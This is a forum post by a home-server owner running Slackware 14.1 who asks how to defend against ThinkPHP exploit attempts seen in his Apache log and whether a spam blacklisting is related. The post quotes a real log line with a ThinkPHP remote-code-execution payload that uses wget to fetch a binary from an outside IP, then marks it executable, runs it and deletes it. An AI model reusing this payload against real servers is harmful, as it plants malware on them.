Hello all.
I have a “little home server” in my home (call me crazy). It’s a LAMP with Slackware 14.1. and I serve my blog from it. I know, I need to upgrade, but I have no time.
I have several doubts (I am thinking now, if it is necessary I can open one thread for each of them).
First, a little view to my server:
Code:
$ uname -a && cat /etc/slackware-version
Linux Sherwood 3.10.17 #2 SMP Wed Oct 23 16:34:38 CDT 2013 x86_64 Intel(R) Xeon(TM) CPU 3.20GHz GenuineIntel GNU/Linux
Slackware 14.1
# httpd -v
Server version: Apache/2.4.6 (Unix)
Server built: Aug 5 2013 16:32:54
# php -v
PHP 5.4.20 (cli) (built: Oct 11 2013 17:50:38)
Copyright (c) 1997-2013 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2013 Zend Technologies
# mysql --version
mysql Ver 15.1 Distrib 5.5.32-MariaDB, for Linux (x86_64) using readline 5.1
My first doudt:
The server was off over a year, because problems with my ISP (I live in a little willage in the North of Spain, in the mountains, and here we only can hire ADSL with one ISP, no rivalry, the prices are excessivelly expensive, and the provided services are minimal, so I declined the contract). I renewed it recently, and server is “on the air” again.
Since I turned it on, I am seeing lines like this in the apache log:
Code:
$ cat /var/log/httpd/access_log | grep thinkphp | tail -n 1
140.238.212.252 - - [27/Jan/2020:03:06:16 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://178.170.40.61/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 200 44335
Lines like this are now usual in my apache access_log.
I read some things about the thinkphp web attack, but I can understand (in my bad english comprehension) that it consists in a remote code execution vulnerability in ThinkPHP, and I am not using the thinkPHP framework in my server, I think (Slack does not install it neither in a full install, and I didn’t installed it):
Code:
$ php -i | grep think
alfonso@Sherwood:~$
But I can see the 200 response in my access_log, and I read in that lines things like:
Code:
wget -O you.are.a.bastard
chmod 777 you.are.a.bastard
./you.bastard.are.executing.code.in.my.machine
rm -rf bastard
I am sure they are playing with my server in a bad way. Are they really doing it? Are they executing code here in the mountains? Because I have not installed thinkPHP… We have only trees, wolfs here, and a bad
sysadmin (edit: we have a forest guard fighting with LAMP, and He usually loses the battle, He is only a luser).
I have read too (important, I know) that this vulnerability is patched (versions affected are thinkPHP ThinkPHP 5.0 and 5.1) but I have not installed it, theither other versions…
So, what’s is happening? How can I defend my machine from this?
I tried to edit my .htaccess file (I did it for a lot of times, I can’t remember, a lot less I can transcibe those attemps here), in order to filter the “thinkphp” match, and I tried searching how to do it with apache too, but my attemps are being unsuccessful (a bad sysadmin, remember)
What can I do?
I think perhaps you need more information about my system, like outputs of httpd -L, php -option, or whatever thing else… But that outputs are large, and you can help me with grep or similar to searching for relevant info.
Note I need a temporary solution, because I know I must upgrade the system, apache, php, etc. I need to implement SSL and HTTPS too (I read a good manual from AlienBob, great!)… And I have a lot less time I would like, and I’m sure I’ll crash something during the process (It is possible that the best way to do all is going to reinstall and reconfigure all, but I’ll try to upgrade and to learn a lot during the process first), so I think all these tasks are going to extend over the time.
My second doubt:
My domain has been blacklisted in Sorbs Duhl and in Spamhaus ZEN. It is possible that exists a relation between the blacklist and my vulnerability?
Thank you very much, and sorry my bad English.